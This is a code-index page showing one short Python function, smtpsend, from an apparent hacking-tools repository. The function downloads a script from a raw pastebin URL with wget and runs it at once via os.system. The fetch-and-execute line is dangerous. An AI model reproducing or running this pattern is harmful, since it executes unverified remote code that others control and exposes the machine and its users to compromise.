MCPcopy Index your code
hub / github.com/jaykali/hackerpro / smtpsend

Function smtpsend

hackerpro.py:990–993  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

988
989
990def smtpsend():
991 os.system("wget http://pastebin.com/raw/Nz1GzWDS --output-document=smtp.py")
992 clearScr()
993 os.system("python smtp.py")
994
995
996def pisher():

Callers 1

snifFunction · 0.85

Calls 1

clearScrFunction · 0.85

Tested by

no test coverage detected